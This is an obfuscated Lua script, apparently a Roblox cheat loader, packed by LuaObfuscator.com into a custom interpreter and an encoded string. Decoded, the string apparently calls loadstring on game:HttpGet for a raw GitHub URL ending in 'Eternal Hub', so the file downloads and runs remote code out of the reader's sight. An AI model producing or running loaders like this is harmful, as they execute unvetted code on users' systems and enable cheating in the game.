--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v116=v5(v87,v19);v19=nil;return v116;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(1 + 0))) + (620 -((1432 -(282 + 595)) + 64)))) ;return v88-(v88%1) ;else local v89=931 -(857 + 74) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and 1) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (1893 -(1523 + (231 -(32 + 85))))) + v36 ;end if (v35==(0 + 0 + 0)) then v36,v37=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;v35=1271 -(226 + 1044) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * ((819 -(87 + 263)) -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + 0 ,49 -29 ) * ((2 + 0)^((399 -272) -95))) + v42 ;local v46=v20(v43,21,(1001 -(10 + 8)) -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -(791 -(368 + 423)))) and  -(1 + 0)) or (998 -((3519 -2604) + 82)) ;if (v46==(0 -0)) then if (v45==((442 -(416 + 26)) + 0)) then return v47 * 0 ;else v46=1 -0 ;v44=0;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v67=1 -0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 611 -(210 + 401) ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91~=(1821 -(1483 + 338))) then else local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if ((1695 -(1229 + 466))==v121) then v122=(function() return 867 -(550 + 317) ;end)();while true do if (v122==(578 -(386 + 192))) then v92=(function() return v93();end)();v94=(function() return nil;end)();v122=(function() return 1207 -(696 + 510) ;end)();end if (v122==(1 -0)) then v91=(function() return  #"!";end)();break;end end break;end end end if (v91== #"!") then if (v92== #"~") then v94=(function() return v93()~=0 ;end)();elseif (v92==(1264 -(1091 + 171))) then v94=(function() return v95();end)();elseif (v92== #"gha") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108~=0) then else local v124=(function() return 0 -0 ;end)();while true do if (v124~=(1990 -(582 + 1408))) then else v99=(function() return 0 -0 ;end)();v100=(function() return nil;end)();v124=(function() return 1;end)();end if (v124==1) then v108=(function() return 1;end)();break;end end end if ((375 -(123 + 251))==v108) then local v125=(function() return 0 -0 ;end)();while true do if (v125==0) then local v128=(function() return 0;end)();while true do if (v128~=0) then else while true do if (v99~=(0 -0)) then else v100=(function() return v101();end)();if (v102(v100, #"!", #":")~=(698 -(208 + 490))) then else local v179=(function() return 1824 -(1195 + 629) ;end)();local v180=(function() return;end)();local v181=(function() return;end)();local v182=(function() return;end)();while true do if (v179~=(1 + 0)) then else v182=(function() return {v103(),v103(),nil,nil};end)();if (v180==0) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=(0 + 0)) then else v186=(function() return 836 -(660 + 176) ;end)();while true do if (v186==(0 + 0)) then v182[ #"xxx"]=(function() return v103();end)();v182[ #".com"]=(function() return v103();end)();break;end end break;end end elseif (v180== #"!") then v182[ #"xxx"]=(function() return v104();end)();elseif (v180==2) then v182[ #"asd"]=(function() return v104() -((204 -(14 + 188))^16) ;end)();elseif (v180== #"asd") then local v194=(function() return 0 + 0 ;end)();local v195=(function() return;end)();while true do if (v194~=(0 -0)) then else v195=(function() return 0;end)();while true do if (v195~=0) then else v182[ #"xnx"]=(function() return v104() -((2 -0)^(2 + 14)) ;end)();v182[ #"http"]=(function() return v103();end)();break;end end break;end end end v179=(function() return 1638 -(1373 + 263) ;end)();end if (v179==0) then local v183=(function() return 675 -(534 + 141) ;end)();while true do if (v183==(1 + 0)) then v179=(function() return 1 + 0 ;end)();break;end if (v183==(0 + 0)) then v180=(function() return v102(v100,2, #"gha");end)();v181=(function() return v102(v100, #"asd1",9 -3 );end)();v183=(function() return 1 -0 ;end)();end end end if ((2 -0)==v179) then if (v102(v181, #"[", #"}")== #">") then v182[2]=(function() return v105[v182[5 -3 ]];end)();end if (v102(v181,2,1386 -(746 + 638) )== #"]") then v182[ #"91("]=(function() return v105[v182[ #"xxx"]];end)();end v179=(function() return 2 + 1 ;end)();end if (v179~=(4 -1)) then else if (v102(v181, #"91(", #"xnx")== #"~") then v182[ #"0313"]=(function() return v105[v182[ #"0836"]];end)();end v106[v107]=(function() return v182;end)();break;end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 341 -(218 + 123) ;end)();while true do if (v112~=(0 + 0)) then else local v126=(function() return 1581 -(1535 + 46) ;end)();local v127=(function() return;end)();while true do if (v126==(0 + 0)) then v127=(function() return 396 -(115 + 281) ;end)();while true do if ((0 -0)==v127) then local v171=(function() return 0;end)();while true do if (v171==(0 + 0)) then v109[v110-#"\\" ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #",",v58 do FlatIdent_12703,Type,v21,Cons,v24,v25,v59,v69=(function() return v51(FlatIdent_12703,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"-19"]=(function() return v21();end)();for v70= #"[",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #"!",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[3 -1 ];local v66=v61[(2452 -(18 + 964)) -(899 + 568) ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(604 -(268 + 335)) ;local v81={};local v82={};for v113=(1091 -801) -(35 + 25 + 230) ,v80 do if (v113>=v74) then v78[v113-v74 ]=v79[v113 + (573 -(426 + 146)) ];else v82[v113]=v79[v113 + 1 + 0 ];end end local v83=(v80-v74) + (1457 -(178 + 104 + 1174)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[812 -(569 + 242) ];if (v85<=(11 -7)) then if (v85<=(1 + 0)) then if (v85>0) then local v129;local v130,v131;local v132;local v133;v82[v84[1026 -(706 + 318) ]]={};v76=v76 + (1252 -(721 + 530)) ;v84=v72[v76];v82[v84[2]]=v63[v84[1274 -(945 + 326) ]];v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[2 + 0 ]]=v63[v84[(1553 -(20 + 830)) -(271 + 429) ]];v76=v76 + 1 + 0 ;v84=v72[v76];v133=v84[2 + 0 ];v132=v82[v84[3]];v82[v133 + (1501 -(1408 + 92)) ]=v132;v82[v133]=v132[v84[1090 -(461 + 625) ]];v76=v76 + (1289 -(993 + 295)) ;v84=v72[v76];v82[v84[1 + (127 -(116 + 10)) ]]=v84[1 + 2 ];v76=v76 + (1172 -(418 + 753)) ;v84=v72[v76];v82[v84[1 + 1 ]]=v84[1 + 2 ]~=(0 + (738 -(542 + 196))) ;v76=v76 + 1 + 0 ;v84=v72[v76];v133=v84[531 -(406 + 123) ];v130,v131=v75(v82[v133](v13(v82,v133 + (1770 -(1749 + 20)) ,v84[3])));v77=(v131 + v133) -(1 + 0) ;v129=1322 -(1249 + 73) ;for v162=v133,v77 do v129=v129 + 1 + 0 ;v82[v162]=v130[v129];end v76=v76 + ((2456 -1310) -(466 + 679)) ;v84=v72[v76];v133=v84[4 -2 ];v82[v133]=v82[v133](v13(v82,v133 + (2 -1) ,v77));v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]();v76=v76 + 1 ;v84=v72[v76];do return;end else local v150=1900 -(106 + 524 + 1270) ;local v151;while true do if (((0 + 0)==v150) or (2874<2181)) then v151=v84[1 + 0 + 1 ];v82[v151]=v82[v151](v13(v82,v151 + 1 ,v77));break;end end end elseif ((v85<=(5 -3)) or (2689<=343)) then v82[v84[5 -3 ]]=v84[117 -(4 + 40 + 70) ]~=(584 -(57 + 527)) ;elseif ((v85>(1430 -(41 + 1386))) or (1869==2009)) then v82[v84[2]]={};else v82[v84[105 -((44 -27) + 86) ]]();end elseif ((v85<=(5 + 1)) or (3546<2322)) then if ((v85==(12 -7)) or (4795<1407)) then v82[v84[1553 -(1126 + 425) ]]=v84[6 -3 ];else v82[v84[5 -3 ]]=v63[v84[3]];end elseif (((1853<4813) and (v85<=((578 -(118 + 287)) -(122 + 44)))) or (2082==4773)) then local v157=0 -0 ;local v158;local v159;local v160;local v161;while true do if (v157==(3 -2)) then v77=(v160 + v158) -(1 + 0) ;v161=0 + 0 ;v157=3 -1 ;end if ((v157==0) or (2821<2431)) then v158=v84[67 -(30 + 35) ];v159,v160=v75(v82[v158](v13(v82,v158 + 1 + 0 ,v84[1260 -(1043 + 214) ])));v157=3 -2 ;end if (v157==2) then for v175=v158,v77 do v161=v161 + (1213 -(323 + 889)) ;v82[v175]=v159[v161];end break;end end elseif ((3244>1055) and (v85>(21 -13))) then local v166=v84[7 -5 ];local v167=v82[v84[583 -(361 + 219) ]];v82[v166 + (321 -(53 + 267)) ]=v167;v82[v166]=v167[v84[1 + 3 ]];else do return;end end v76=v76 + (414 -((1136 -(118 + 1003)) + 398)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403653Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5468654F6E6557686F416C77617973576174636865732F526F626C6F782D536372697074732F726566732F68656164732F6D61696E2F457465726E616C253230487562000A4Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
